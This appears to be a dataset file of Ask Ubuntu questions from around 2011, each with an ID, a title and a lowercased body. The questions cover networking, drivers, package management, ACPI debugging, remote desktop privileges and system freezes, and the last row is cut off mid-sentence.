47904	how to switch from automatic dhcp to manual setting of the wireless network	when waking up from sleeping my netbook ( ubuntu 11.04 ) is very fast ( less than 10 secs ) . however most of the time building up the wlan connection takes 30 secs . somewhere i read , that setting your wireless at home to manual setting would speed up the connection process . could somebody explain me what to put into the fields of gnome network manager after choosing manual ?
47905	original classic-gnome.session	the question should be simple : i carelessly replaced the file /usr/share/gnome-session/sessions/classic-gnome.session without making a backup file . the thing is that i did n't get what i needed and i need to get back the original version of this file . machine ( laptop ) : 11.04 ( natty narwhal ) , kernel 2.6.38-8-generic reading another question i found that the following contents can be a good alternative , but i do n't dare to use it already : [ gnome session ] name=classic gnome required=windowmanager ; panel ; filemanager ; required-windowmanager=gnome-wm required-panel=gnome-panel required-filemanager=nautilus defaultapps=gnome-settings-daemon ;
47906	recompile all packages and trigger on updates	i am using ubuntu on a bespoke router and after seeing the latency drops capable with custom compiling on gentoo , i would like to recompile all packages with cflags= '' -march=atom '' . the guide for this and a helpful forum thread demonstrate the recompilation steps : export cflags= '' -march=nocona '' export cxxflags= '' -march=nocona '' apt-get build-dep packagename apt-get -b source packagename dpkg -i *.deb is it possible to automate a complete system recompilation instead of specifying one package at a time and to automatically recompile new package updates before they are installed ?
47910	how to install wvdial.deb ?	i am using ubuntu 10.10 but unable to connect my zte modem ( cdma model : ac 682 ) . then i tried to install wvdial.deb from my local drive but it showing message ( e : file not found ) invain to install . please tell me how to solve this problem .
47912	upgrading from 10.10 to 11.04 when 10.10 was installed using wubi	i had installed ubuntu 10.10 using wubi so i could dual boot with windows and ubuntu . now i am upgrading to ubuntu 11.04 using the upgrade option provided within ubuntu itself ( using the update manager ) . will this in any way affect my windows and other files on my hdd ? i hope the installation of the new packages automatically will not format my d drive i.e . i hope this automatic update will not make a clean install by formatting all the data in my hard disk . this might sound like a silly question , but i just want to double check while the upgrade files are being downloaded . thanks , zeiger
47914	libreoffice unity launcher does n't work	has anyone else experienced this situation ? i can only click one single time on libreoffice writer 3.4 unity launcher . then , it simply freeses and do n't respond ... any way to fix it ?
47915	acpi issue , help to fix broken dsdt on an hp pavilion dv6-6008el	i 'm having a hard time fixing the acpi subsystem of an hp laptop ( pavilion dv6-6008el , ubuntu natty 64-bit ) . i can boot only if acpi=off is specified as kernel parameter in grub , otherwise blank screen and system hanging . both blank screen and acpi disabled are not acceptable . there is another similar question by me on ask ubuntu with other details . i was able to find good docs about how to debug acpi ; particularly useful is this technique : if decompiling and recompiling a dsdt table the compiler gives an error , well ... the table is broken and this could be the reason for the boot failure . next step is fix the code , compile and override the system dsdt with the fixed one ( recompiling the kernel or building the custom dsdt into an initrd ) . this is the procedure : # apt-get install acpidump # dump a system 's acpi table with dstd signature to an ascii file sudo acpidump -t dsdt > dump # convert ascii acpidump output to raw binary table . creates dsdt.dat , binary . acpixtract dump # apt-get install iasl # disassemble aml to asl , creates dsdt.dsl # ( aml : acpi machine language , binary . asl : acpi source language , source ) iasl -d dsdt.dat # recompile aml in assembler ( -ta ) or c ( -tc ) hex table . -vr disables remarks . iasl -vr -tc dsdt.dsl oops , iasl intel compiler complains : dsdt.dsl 37 : external ( \tnot ) error 4057 - ^ name already exists in scope ( \tnot ) dsdt.dsl 11050 : method ( papr , 0 , notserialized ) warning 1088 - ^ not all control paths return a value ( papr ) dsdt.dsl 12566 : method ( _crs , 0 , notserialized ) warning 1088 - ^ not all control paths return a value ( _crs ) dsdt.dsl 12566 : method ( _crs , 0 , notserialized ) warning 1081 - ^ reserved method must return a value ( buffer required for _crs ) asl input : dsdt.dsl - 12748 lines , 424447 bytes , 5910 keywords compilation complete . 1 errors , 3 warnings , 8 remarks , 20 optimizations here is the full table source ( 36kb ) . any help to fix the issue , error and warnings , is greatly appreciated . many thanks . useful resources advanced configuration and power interface specification v4 , 2010 ( ch 18 asl ref , ch 19 , aml spec ) index of /doc/documentation/acpi ( kernel.org ) linux/acpi overview - superseded by lesswatts.org , saving power on intel systems with linux acpica ( acpi component architecture ) howto fix a buggy dsdt file ( ubuntuforums.org )
47916	what are the different uses for apt-build optimization levels ?	was installing apt-build . saw three levels of optimization for code , `` light '' , `` medium '' and `` strong '' . it warned that strong would lead to system instability , so i opted for medium . is there an observable difference between the levels of optimization ? should i just go -o3 ?
47918	how can i enable wake-on-lan permanently ?	i want to enable wake-on-lan for my network cards , for always . the community guide recommends adding the relevant command to /etc/interfaces . in past experiences editing ubuntu conf files , it 's extremely likely that the network interface file is written anew every boot , if not every apt upgrade . what 's the best way to ensure that wake-on-lan is enabled every boot ?
47920	where can i locate the gnome classic panel `` quick launcher '' icons in unity	i spend some time between both worlds , unity and gnome classic ( no effects ) and i would like to know where can i find the quick launch icons of the gnome classic panel in unity so i can simply drag & drop them in the unity launcher .
47930	what happened to the kbib package ?	i have just upgraded to ubuntu natty , but i found there is not the kbib package any more . can anybody tell me why ? which is the easiest way to have kbib on natty ?
47935	filter files in a folder ?	how can you filter out files in a given folder by typing in characters into a `` filter by '' box ? is there a script or extension that will enable this functionality in nautilus ?
47937	how do i set my system to auto-update without user interaction ?	how can i set my ubuntu to not only update regularly ( and automagically ) the security updates ( i could set that when installing ubuntu ) , but to update all the packages automatically , in the background , without user interaction ? extra question : if i could configure that how often does my ubuntu box check for update , then what should i set ? check it in every hour ? or are there any built-in random way , i mean ubuntu waits for a random time , then it checks for updates ? ( to not give big traffic to the repository servers at every whole hour , e.g . : 20h ; 21h ; 22h ; etc . )
47938	how can i get the percentage of my battery life from the command line ?	this question tells me how i can find the state of my battery from the command line . while this is useful information sometimes i need something quicker , basically like the percentage or enough for me to determine if i need to charge right away or if i can keep going for a bit longer without me having to care about milliwatts from catting my battery stats .
47941	program preferences no longer recognizes desktop webmail	until today , i had desktop-webmail as my preferred e-mail client . today , i clicked on an e-mail link , and up popped an evolution window . i do not know of any changes that i deliberately made to desktop-webmail or the preferred applications settings . when i opened the preferred applications settings , i did not have the option to select desktop-webmail , nor did i have custom command entries available for either the web browser or the e-mail client settings , although i did still have the custom command entry available for other program preferences . 1 ) does this indicate some deeper misconfiguration in my system that i need to try to fix ? 2 ) what is the command line for resetting my default e-mail client ?
47942	when machine is headless , user is no longer privileged	the core issue is : any gnome session not sitting ontop of a real physical/native display -- or shadowing that display ( ie . nxserver 's shadow mode ) -- has faulty privileges . even when run as root ! any comments on a way to fix the problematic behavior for the vnc/non-shadow nx sessions ? i 'm upgrading my home ubuntu headless server after a long while , and i 'm having lots of problems that i do not remember existing in previous ubuntu versions . some details : i started with ubuntu-11.04-server-amd64.iso and then installed ubuntu-desktop on-top of it . uname -a : linux middleearth 2.6.38-8-server # 42-ubuntu smp mon apr 11 03:49:04 utc 2011 x86_64 x86_64 x86_64 gnu/linux the hardware is intel d920 , 2gb ram , gfx is some fan-less nvidia 6600 , 3xgigabit , 1x100mbit , no monitor , keyboard , mouse attached . round 1 while i was doing the testing/setting up with a monitor attached , everything was peachy , both when sitting infront of that monitor and when vncing in from my desktop machine ( into vino ) . without a monitor though problems arise : [ unsolved/dropped ] the very first problem was vino being stubborn and not liking to load before/during gdm . but since this is a headless system , i dont really need it to start with x by default ( ie change the init level ) anyways , so that 's a bit moot . however , i distinctly remember this being very easy to do in an older ubuntu version ( v9.04 i think ) . and it worked fine ; but not any more ! ? ... anyways i dropped that idea altogether . [ solved ] then it was unity/effects messing vnc ( solved it by cheating ) . [ unsolved ] i originally switched to nxserver hoping that maybe the following problems are tightvnc or vino issues , but no such luck . ( note : read round2 ) when remoting in via vnc ( or nxserver ) my user account loses the ability to mount/unmount hdds . when remoting in via vnc ( or nxserver ) my user account can not access some priviledged configuration options , some examples : can not do anything ( ie . 'add ' a user or 'advanced settings ' ) in `` system - > administration - > users and groups '' . can not use 'unlock ' in `` system - > administration - > login screen '' . gparted fails to get any information about the filesystems . etc . ( various other admin/config dialogues do n't properly work either ) i can only guess this has something to do with user privileges not being assigned properly when an actual physical monitor device is not connected . the reason 'why ' this happens in ubuntu 11.04 , when it is headless , escapes me ; i do not remember this behaviour in previous versions of ubuntu . do note that the hdd mounting problem is a non-issue for internal/static hdds ( i just add them to fstab since they 're static anyways ) . but really a big pain for removable usb media . the rest of the problems , i have not figured out how to fix ... i know what you 're thinking ... log in to ssh , sudo su , and run vncserver under root entirely ? surprise surprise ! root 's gui is broken too : gparted fails to get info , user & groups is entirely grayed out ( this is a different behaviour than my regular user ) . weirdly enough the login screen administration proggy seems to work fine . round 2 ( note : i do not know if this did or did not make a difference to the outcome . at some point between round 1 and round 2 , i applied the changes mentioned in posts # 21 and # 24 in this thread ) the regular tightvnc/nxserver sessions have the same behaviour , but ... [ partial solution/the actual problem is still there ] in the nxclient connection settings , when i choose the 'shadow ' mode ( shadow attaches you to the native display , ie . desktop shadowing ) ... everything works perfect inside this session ! one thing i noticed is that it immediately asks me for a keyring password ... maybe the whole mess has something to do with the keyring system gnome uses ? but , if i connect with a regular ( not shadow ) nx connection , or a regular vnc it goes back to having the same problems . p.s . there were a couple of days inbettween when i wrote round1 and round2 ( i was keeping it in a txt file locally ) . i was testing out various sugestions to see what would work , which is why i do n't know for sure if that xorg.conf vnc device edit or that nomodeset setting made a difference . [ edit 2011-06-10 ] nxserver and gdm at the time of writing i had set the system up to auto-login , which was why the shadow connection just simply worked . when i later disabled that and rebooted the system , nx gave an error , but with a little bit of googling i found this thread these are the uncommenting & changes i did on my /usr/nx/etc/server.cfg : enableadministratorlogin = `` 1 '' enablesessionshadowing = `` 1 '' enableinteractivesessionshadowing = `` 1 '' enablesessionshadowingauthorization = `` 0 '' enabledesktopsharing = `` 1 '' enableinteractivedesktopsharing = `` 1 '' enablefulldesktopsharing = `` 1 '' enableadministratordesktopsharing = `` 1 '' enabledesktopsharingauthorization = `` 0 '' enablesystemdesktopsharingauthorization = `` 0 '' ( if it was a more public network , ie university/large office i 'd probably use a little stricter settings , but these suit me fine . ) after a reboot i logged in with nxclient to the desktop 'shadow ' ( native display ) setting and got gdm ! : d unfortunately clipboard does n't work in the 'shadow ' session ( it works on the other/regular ones fine ) [ edit 2011-06-11 ] stumbled upon xvfb but it has the same issues when used like this : xvfb :2 -ac -screen 0 1280x1024x32 -pixdepths 8 24 2 > & 1 > /dev/null & export display=:2 gnome-session -- session=2d-gnome 2 > & 1 > /dev/null & x11vnc -- display :2 -- passwd blahblah
47947	banshee not able to get track information ?	everytime i try to copy a cd to banshee i get an `` unable to fetch track information '' message ? ( while connected to internet )
47950	unity desktop launcher and bars look garbled with ati radeon	i just installed ubuntu 11.04 32-bit on my old p4-ati radeon rig . boots well , gets into desktop , however left bar and top bar are garbled . main desktop area and windows in that area are mostly fine , however some windows such as settings window have areas that disappear when mouse-over occurs . right click menus also are garbled . my guess is that my agp ati radeon 3-series driver has faulty implementation . what can i do ?
47953	can i run fsck or e2fsck when linux file system is mounted ?	i mean i 'm already here right . if not , why ?
47955	how can i try ubuntu without changing anything on my computer ?	i 've never used linux before and i 'm a little unsure .
47961	photo album making software	looking for some good software for making photo albums for my personal use . seen some good programs in windows that generate flash albums .
47963	how can i quickly make a large file ?	what is a quick and easy way to make a file that is , say , 2 gb in size ?
47973	unity not working correctly after using `unity -- reset`	i recently had crashed unity which i recovered using command unity -- reset . i do n't know what triggered this , but now i ca n't see the menu-bar of my applications lying in the top panel , rather , they are now integrated with the application , so like 10.10 and unlike 11.04 is anybody having any fix for this ? ( segregated from this question )
47976	how can i get a more traditional drop-down like menu for unity ?	i ca n't find a drop-down like 10.10 where i could list all the applications/menu . i understand that the launcher is there for it now , but somehow , i currently feel that i was more comfortable with the drop-down menus . any fix for this one ? ( segregated from this question )
47979	libdvdread : debugging block seek errors	i have been having a recent rash of problems with `` ca n't seek to block errors '' from libdvdread with specific dvds and vlc . most dvds work fine . the error message is not very descriptive , it just says `` libdvdread : ca n't seek to block xxx '' . however , on examination of the source code for libdvdread this error message could be being generated form several places . are there any plans to add some annotations ( e.g . __file__ , __line__ , __function__ etc . ) to these error messages to make tracing them easier ? i 've looked up the development site for libdvdread , but the site shows little sign of activity since 2006 , and the web page at chalmer 's university in sweden on libdvdread no longer exists , at least the one pointed to from the libdvdread development site . useful links : http : //ubuntuforums.org/showthread.php ? t=1767768 ( my post about this on the ubuntu forums ) http : //freshmeat.net/projects/libdvdread/ ( libdvdread development site ) wanted to create these tags but could n't ( reputation < 300 ) : libdvdread libdvdcss
47980	are kernels from ubuntu kernel ppa supported for the same time frame as the version they are intended for ?	i wonder if i install a kernel from the ubuntu kernel ppa and have 10.04 lts as my version , because i like the long support period , will they follow the same end of support time ? 10.04 lts desktop has april 2013 and server has april 2015 as end of support . if i look at the ubuntu kernel ppa site i can not find any references to how long they will commit to provide updates . can i have any expectations at all since it is a ppa ? the kernel packages in 10.04 are supported to april 2015 according to synaptic . i do n't want to end up with a system that has updates available for everything but the kernel .
47994	where to install unpackaged applications ?	i use mac and windows and i 'm switching on ubuntu . i use a opensource program that is not packaged , it is distributed as an archive . the documentation indicates to add the executable in the `` home '' folder . the app works regardless of the location , so where should i install an application in ubuntu ? what is the recommended or ideal location ? thank you
47997	how to remove the `` for purchase '' section from the software center ?	the software center has a section of for purchase programs —see screenshot below— , which is annonying me every time i want to install something . is there any way to remove or hide these programs from the software center ? links to answers : for 13.10 and higher → for 13.04 → for 12.10 → for 12.04 → for 11.10 and lower → please leave a comment or send a mail to jmendeth @ gmail.com if it 's not working for you or you 're having trouble !
48001	connect to bluetooth device from command line	background : i 'm using my bluetooth headset as audio output . i managed to get it working by the long list of instructions on bluetoothheadset community documentation , and i have automated the process of activating the headset as default audio output into a script , thanks to another question . however , since i use the bluetooth headset with both my phone and computer ( and the headset does n't support two input connections ) in order for the phone not to `` steal '' the connection when handset is turned on , i force the headset into a discovery mode when connecting to the computer ( phone gets to connect to it automatically ) . so even though the headset is paired ok and would in `` normal '' scenario autoconnect , i have to always use the little bluetooth icon in the notification area to actually connect to my device ( see screenshot ) . what i want to avoid : this gui for connecting to a known and paired bluetooth device : what i want instead : i 'd want to make the bluetooth do exactly what the clicking the connect item in the gui does , only by using command line . i want to use command line so i can make a single keypress shortcut for the action , and would't need to navigate the gui every time i want to establish a connection to the device . the question : how can i attempt to connect to a specific , known and paired bluetooth device from command line ? further question : how do i tell if the connection was successful or not ?
48002	how to get an encfs mount on the unity launcher ?	i 've created a encfs mount on my home and i am starting it automatically with gnome-encfs , however there is no icon on the unity dock , but instead there is a icon on the desktop . i would rather have it on the dock since it seems more natural as it happens with usb sticks , cd roms , dvds , etc ... is it possible ? how ?
48009	how can i install a previous version of xserver-xorg-video-intel ?	i am suffering from a xorg/intel bug ( specifically s-video related : https : //bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-intel/+bug/763688 ) . this cropped up when i upgraded from maverick to natty . is it possible and safe to install the old ( maverick ) version of xserver-xorg-video-intel while keeping everything else ? if so , how ? ( preferably using a package rather than having to download and compile anything . ) if it does n't work , how do i revert ?
48011	editing ubuntu one notes in safari browser	yesterday i borrowed a friend 's ipad to edit an ubuntu-one note using the web interface . i found that i could n't edit the text of a note , only the title . the contents of existing notes were rendered in a kind of `` text box '' , however safari did not allow me to edit any of the text . this was the same when trying to create a new note . is this a safari problem or something to do with the https : //one.ubuntu.com/notes/ ? can anyone else replicate ? as i was only borrowing the ipad i did n't have time to get enough details ( e.g . browser version ) in order to submit a decent bug report . thanks .
48013	how to access ubuntu desktop from a windows system ?	when using terminal server client , it is possible to access the windows desktop ( remote desktop ) , from an ubuntu pc . is the reverse possible ? what is the windows xp application used to connect to an ubuntu desktop ? is the default mstsc application sufficient ? if yes , what are the required settings on ubuntu and windows ? i want to view the desktop , not just an ssh terminal access .
48014	how force remove when post-installation script always fail	i have a custom package installed on my ubuntu 10.10 , and trying to remove it , i got : $ sudo dpkg -r package sub-process script post-installation installed returne an error state 127 ( the message returned from the command was translated from portuguese ( br ) . so , i noted that on the installation script of this package , what it did was create an entry on my startup , create a folder on /opt and create a user . i removed all it created . but now , i just want to remove it from dpkg list , because i want to make my linux like if i never installed this package . how can i do this ?
48019	what are the common file extensions in ubuntu ?	knowing file extensions really helps to understand what a program is doing or using . what are some common one 's and how do i extract them ?
48025	what to do when ca n't update anymore with apt-get ?	i 'm using ubuntu 9.04 as multipurpose server , so no gui here . i have n't used it for a while and now when trying to install or update packages with apt-get it throws errors . an excerpt of the error messages : root @ vps609 : /home # sudo apt-get update err http : //security.canonical.com jaunty-security release.gpg could not resolve 'security.canonical.com' err http : //security.canonical.com jaunty-security/universe translation-en_us could not resolve 'security.canonical.com' get:3 http : //archive.canonical.com jaunty release [ 10.5kb ] get:4 http : //archive.canonical.com jaunty-updates release [ 10.5kb ] fetched 21.4kb in 0s ( 56.3kb/s ) reading package lists ... done w : failed to fetch http : //security.canonical.com/ubuntu/dists/jaunty-security/release.gpg n_us.bz2 could not resolve 'security.canonical.com' w : failed to fetch http : //archive.canonical.com/ubuntu/dists/jaunty-updates/release unable to find expected entry universe/binary-amd64/packages in meta-index file ( malformed release file ? ) w : some index files failed to download , they have been ignored , or old ones used instead . w : you may want to run apt-get update to correct these problems i thought the url 's had changed so i tried to change the /etc/apt/sources.list with following sources : deb http : //archive.canonical.com/ubuntu/ jaunty main universe multiverse restricted deb http : //security.canonical.com/ubuntu/ jaunty-security universe main multiverse restricted deb http : //archive.canonical.com/ubuntu/ jaunty-updates universe main multiverse restricted but it seems apt-get does n't use these new sources and keeps trying the old ones . any ideas ?
48029	investigating a system `` freeze ''	am on ubuntu 10.04.2 lts linux skiran 2.6.32-32-generic-pae # 62-ubuntu smp wed apr 20 22:10:33 utc 2011 i686 gnu/linux my machine froze for the 5th time in 2 days . had to reboot , and login to a failsafe session to collect and review logs . alt+f2 to run nm-applet , so that the network connectivity works alt+f2 to run gnome-do , to launch my applications ( i prefer using gnome-do , to using menu options , or alt+f2 ) i noticed the following errors in the various /var/log/* files , at the time my machine last froze ( around 14:32 on june 10 ) in kern.log jun 10 14:32:17 skiran kernel : [ 0.766164 ] pm : resume from disk failed . in syslog jun 10 14:32:17 skiran kernel : [ 0.766164 ] pm : resume from disk failed . jun 10 14:32:22 skiran pulseaudio [ 1867 ] : module.c : failed to load module `` module-alsa-card '' ( argument : `` device_id= '' 1 '' name= '' pci-0000_01_00.1 '' card_name= '' alsa_card.pci-0000_01_00.1 '' tsched=yes ignore_db=no card_properties= '' module-udev-detect.discovered=1 '' '' ) : initialization failed . jun 10 14:32:22 skiran pulseaudio [ 1867 ] : module.c : failed to load module `` module-alsa-card '' ( argument : `` device_id= '' 29 '' name= '' platform-thinkpad_acpi '' card_name= '' alsa_card.platform-thinkpad_acpi '' tsched=yes ignore_db=no card_properties= '' module-udev-detect.discovered=1 '' '' ) : initialization failed . jun 10 14:32:24 skiran gdm-session-worker [ 1865 ] : glib-gobject-critical : g_value_get_boolean : assertion `g_value_holds_boolean ( value ) ' failed jun 10 14:32:35 skiran pulseaudio [ 2062 ] : module.c : failed to load module `` module-alsa-card '' ( argument : `` device_id= '' 1 '' name= '' pci-0000_01_00.1 '' card_name= '' alsa_card.pci-0000_01_00.1 '' tsched=yes ignore_db=no card_properties= '' module-udev-detect.discovered=1 '' '' ) : initialization failed . jun 10 14:32:35 skiran pulseaudio [ 2062 ] : module.c : failed to load module `` module-alsa-card '' ( argument : `` device_id= '' 29 '' name= '' platform-thinkpad_acpi '' card_name= '' alsa_card.platform-thinkpad_acpi '' tsched=yes ignore_db=no card_properties= '' module-udev-detect.discovered=1 '' '' ) : initialization failed . also in wcstatus.log noticed several errors , occurring at the time the machine froze . this is the ibm vpn client . 3053452144 : device : ( 2011-06-10 / 14:32:20.385908 ) : wg_status_linux_hw_name : wlan0 is a pci interface . 3053452144 : device : ( 2011-06-10 / 14:32:35.043054 ) : wg_status_adapter_event_thread : broke out of read for ip interface state changes . 3053452144 : device : ( 2011-06-10 / 14:32:35.043086 ) : wg_status_adapter_event_thread : calling event function so the event can be processed . 3053452144 : device : ( 2011-06-10 / 14:32:35.043124 ) : wg_status_gather_unix_add_new_ifaces : see if we have new ifaces 3053452144 : device : ( 2011-06-10 / 14:32:35.043263 ) : wg_status_gather_linux_if_info : the ifr struct from hwaddr ioctl for adapter eth0 is 0x0000 : 65 74 68 30 00 00 00 00 00 00 00 00 00 00 00 00 [ eth0 ... ... ... ... ] 0x0010 : 01 00 f0 de f1 0d 40 d2 c8 d9 ff b5 b1 b0 83 b7 [ ... ... @ ... ... ... ] . 3053452144 : device : ( 2011-06-10 / 14:32:35.043293 ) : wg_status_gather_linux_if_info : the adapter description for adapter eth0 is ethernet . 3053452144 : device : ( 2011-06-10 / 14:32:35.043432 ) : wg_status_linux_hw_name : eth0 is a pci interface . 3053452144 : device : ( 2011-06-10 / 14:32:35.046584 ) : < name : eth0 > < hardware address : f0 : de : f1:0d:40 : d2 > < ip address : 9.182.74.162 > < subnet : 255.255.255.0 > < network mtu : 1500 > < state : active > < adapter description : intel corporation 82577lm gigabit network connection > < adapter speed : 100000000 > < point-to-point : false > 3053452144 : device : ( 2011-06-10 / 14:32:35.046611 ) : < name : eth0 > < received stats : ( 1471 byte ) ( 0009 pack ) ( 0000 err ) > < transmit stats : ( 1836 byte ) ( 0010 pack ) ( 0000 err ) > 3053452144 : device : ( 2011-06-10 / 14:32:35.046631 ) : wg_status_gather_impl : :wg_consumer_add_item added object to consumer signal the consumer thread . 3053452144 : device : ( 2011-06-10 / 14:32:35.046651 ) : wg_status_gather_linux_if_info : the ifr struct from hwaddr ioctl for adapter wlan0 is 0x0000 : 77 6c 61 6e 30 00 00 00 00 00 00 00 00 00 00 00 [ wlan0 ... ... ... .. ] 0x0010 : 01 00 00 27 10 7c 6f e8 00 00 00 00 5e f7 88 b7 [ ... '.|o ... ..^ ... ] . 3053452144 : device : ( 2011-06-10 / 14:32:35.046674 ) : wg_status_gather_linux_if_info : the adapter description for adapter wlan0 is ethernet . 3053452144 : device : ( 2011-06-10 / 14:32:35.046783 ) : wg_status_linux_hw_name : wlan0 is a pci interface . i have attached the kern.log , syslog , wcstatus.log , messages , dpkg.log ( on pastebin.ubuntu.com . contains messages generated on 10 june only ) - thanks for the tip jamess updates : 12 june i logged into gnome session , and had enabled apport . two minutes after logging in , the system froze . logged back into fail-safe , and noticed these two crash reports in /var/crash : _usr_bin_skype.1000.crash , _usr_lib_gnome-do_do.exe.1000.crash . also /var/log/apport.log reported process 2222 caused signal 6 . this process happens to be mono+gnome-do combination . am thinking this could be some problem related to mono - but then am not 100 % sure . referred to this link , and ran this command sudo apt-get purge libmono0 mono-common libgdiplus . need to see if this makes a difference . please let me know if you find anything amiss , and can suggest a solution . i do not want to leave the failsafe session , till i come across some possible solutions .
48030	tex live 2010 or 2011 in 11.10 ?	will ubuntu 11.10 ship with tex live 2010 or 2011 ? it seems debian will package tex live 2011 and tex live 2011 has now been released . see also : needs-packaging request on launchpad .
48035	why is natty-proposed suggesting an upgrade to a beta version of firefox ?	well i loaded up update manager today and it wants to replace firefox 4.0.1 with 5.0beta5 . to double check i fired out apt-cache policy firefox and there it is : 5.0~b5+build1+nobinonly-0ubuntu0.11.04.1 0 500 http : //gb.archive.ubuntu.com/ubuntu/ natty-proposed/main amd64 packages i 've never known ubuntu to update the browser like this before , mid-release . especially not to a beta . does anybody know what 's going on behind the scenes ? why is natty having its browser updated to a new major version ?
48038	system boots to busybox 1.5.1	i am having some trouble with my ubuntu 10.10 , which i installed on windows filesystem using wubi.exe . for sometime now , whenever i boot ubuntu , it boots up to busybox showing initramfs as shell . from initial solutions mentioned on the web , i have cleaned my partition on windows ( using chkdsk ) , but the problem still persists . any suggestions how i could fix my problem ? ?
48039	does dnscache really improve the surfing speed ?	i have installed dnscache ( dnscache-run ) from ubuntu repositories and i have increased the cachesize and datalimit to 256mb ( 268435456 ) . today i have tested it with one domain : google.es . i have executed in console dig google.es : ; ; query time : 86 msec ; ; server : 127.0.0.1 # 53 ( 127.0.0.1 ) i have repeated the query : ; ; query time : 0 msec ; ; server : 127.0.0.1 # 53 ( 127.0.0.1 ) correct . after i have visited various websites with firefox for at least 10 minutes and i 've repeated the query : ; ; query time : 87 msec ; ; server : 127.0.0.1 # 53 ( 127.0.0.1 ) in 10 minutes of internet surfing has it had to empty a cache of 256mb ! ? furthermore , in those 10 minutes i 've done several searches on google.es . based on these results so disappointing my question is obvious : does dnsache really improve the surfing speed ? maybe something is wrong with my settings ?
48042	how to install ubuntu networking	i installed ubuntu server when i was not plugged into the network . i selected configured network at a later time when it asked about dhcp . how do i now install the network ? there is no eth0 entry in the interfaces file .
48043	machine showing grub menu but wo n't boot	i have had my machine working fine for a a long time and it never displayed the grub menu while booting . now when i turn it on , it shows the grub menu but when i select the first option it gives an error about not being able to mount / . it 's pretty clear that my hard drive is failing , except i am confused about how it is able to get as far as the grub menu . is n't grub on the hard disk ? i only have one hard disk so if grub is coming up , does n't that indicate that my hard drive is working ? if so , why wo n't it boot ?
48045	how can i install sybase ase 15.5 step by step ?	if anyone has successfully installed sybase ase 15.5 on ubuntu 10.10 or 11.04 please share your installation process step by step . thanks in advance
48050	nvidia optimus card does not work ?	my notebook ( asus a40j series ) comes with hybrid graphics : nvidia gf310m and intel . i ca n't use the nvidia card in my machine and am using ubuntu 10.04 . how can i get this work ?
48052	rhythmbox controls are missing from the soundmenu	i re-installed ubuntu two weeks ago and at the start i could control rhythmbox from the sound menu , but now it disappeared and i do n't know how to bring it back . in `` sound prefernces ... '' , in the `` applications '' tab , rhythmbox is shown but i can only control it 's volume . for example in the start it was something like that ( but for rhythmbox ) : how it 's supposed to be -
48053	gource export video error `` could not find codec parameters ''	i want to output a video of gource , i follow this guide creating videos with gource but i get error on video codec . i also use this guide enable libx264 support on this is my error : gource -o - | ffmpeg -y -b 3000k -r 60 -f image2pipe -vcodec ppm -i - -vcodec libx264 -vpre slow -threads 0 gource.mp4 pipe : : could not find codec parameters
48060	what should i know about ssds that can be used with ubuntu ?	i 'm building a new configuration and intend to buy an ssd with it . i recall that the first ssds were problematic in linux for some reason ( maybe lack of trim support ? ) . is there something to specifically avoid in today 's ssds ? or is it a safe bet to buy any ?
48061	my libreoffice writer application wo n't start - fatal error message `` caught unexpected exception ''	i am very new to ubuntu and am not very computer savy . if you can help me with this , please use plain language as much as possible .
48063	ca n't create couchdb addressbooks in evolution ?	i ca n't seem to create new couchdb addressbooks in evolution or open the ones evolution thinks i have.. i 've tried walking through these suggestions to no avail : $ killall beam.smp beam beam : no process found $ rm /home/amanda/.config/desktop-couch/desktop-couchdb.ini $ dbus-send -- session -- dest=org.desktopcouch.couchdb -- print-reply -- type=method_call / org.desktopcouch.couchdb.getport error org.freedesktop.dbus.error.noreply : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . the next suggestion is to killall -9 e-addressbook-factory then export couchdb_debug_messages=1 and relaunch with /usr/lib/evolution/e-addressbook-factory & e-addressbook-factory is n't running , but relaunching it looks to go fine . when i try to view my couchdb address books ( i tried creating a second one , so i have two now ) , i get this : ** ( e-addressbook-factory:6491 ) : warning ** : could n't get port for desktopcouch : traceback ( most recent call last ) : file `` /usr/lib/pymodules/python2.6/dbus/service.py '' , line 702 , in _message_cb retval = candidate_method ( self , *args , **keywords ) file `` /usr/lib/desktopcouch/desktopcouch-service '' , line 73 , in getport port = int ( desktopcouch._direct_access_find_port ( ) ) file `` /usr/lib/python2.6/dist-packages/desktopcouch/__init__.py '' , line 193 , in __find_port__linux return __find_port__linux ( pid , ctx , retries_left - 1 ) file `` /usr/lib/python2.6/dist-packages/desktopcouch/__init__.py '' , line 193 , in __find_port__linux return __find_port__linux ( pid , ctx , retries_left - 1 ) file `` /usr/lib/python2.6/dist-packages/desktopcouch/__init__.py '' , line 193 , in __find_port__linux return __find_port__linux ( pid , ctx , retries_left - 1 ) file `` /usr/lib/python2.6/dist-packages/desktopcouch/__init__.py '' , line 194 , in __find_port__linux raise runtimeerror ( `` unable to find listening port '' ) runtimeerror : unable to find listening port ** ( e-addressbook-factory:6491 ) : warning ** : could not create desktopcouchsession object the last suggestion there -- stop desktopcouch and remove the .ini file and cached couchdb.html -- does n't work any better . ** ( e-addressbook-factory:6680 ) : warning ** : could n't get port for desktopcouch : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . ** ( e-addressbook-factory:6680 ) : warning ** : could not create desktopcouchsession object i actually do n't need my data , i 've got that . i would like to start using ubuntuone 's contact sync , however . there 's clearly something missing here .
48071	adding to panel does n't work	i recently upgraded from ubuntu 10.10 to 11.04 . at the login screen i selected and currently use the ubuntu-classic option . after upgrading to 11.04 , when i right-click on the top panel , all of the options are available ( add to panel ; properties , etc ) . when i select `` add to panel '' , the dialog box of options does indeed appear . however , when i select an option and click the `` add '' button , nothing happens . i also can not drag/drop the selected icon up to the panel either . is there a simple fix for this ? thank you
48072	win7/ubuntu dual booting : black screen after reinstalling ubuntu 10.10	i 've been experiencing this black screen after reinstalling ubuntu in a dual booting with windows 7 . i 've actually research on this site and on google and i feel my scenario is a bit different . first thing is that this is the third time i 'm installing ubuntu 10.10 with the same dvd , and this is the first time i 'm seeing this . on my previous intallation , i was running some database script and i noticed my machine was freezing . it took a long time , but i had no chance to restart it . so i did a hard reboot ( holding down the power button and press it again to start again ) . that puts me in front of the busybox screen , and i had to fix it with the livecd ( fsck /dev/sda4 ) . but after this i realized that the machine was pretty slow , and i thought something is wrong with the file system . so i picked up the livecd again and did a fresh installation of ubuntu , but when i 'm prompted to redraw the livecd it turns black ( 2 times actually ) . now there is one thing i did notice that makes me doubt my installation proces . most of the time i simply delete the partition and create a new one . but i 've kept it this time and marked it to be formated . so i 'm not sure on that one . my machine comes with an ati graphics card , and most of what i 've read about online is about nvidia drivers ( 